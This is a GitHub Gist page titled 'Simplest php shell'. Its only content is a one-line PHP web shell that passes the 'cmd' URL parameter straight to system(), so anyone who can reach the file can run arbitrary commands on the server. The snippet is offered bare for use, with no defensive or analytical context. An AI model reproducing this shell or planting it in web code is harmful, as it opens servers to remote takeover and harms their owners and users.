Skip to content

Instantly share code, notes, and snippets.

@VisualBean
Created January 3, 2025 12:37
Show Gist options
  • Save VisualBean/176f123b2a4aeb2ced2d90dbce260787 to your computer and use it in GitHub Desktop.
Save VisualBean/176f123b2a4aeb2ced2d90dbce260787 to your computer and use it in GitHub Desktop.
Simplest php shell
<?php system($_GET["cmd"]); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment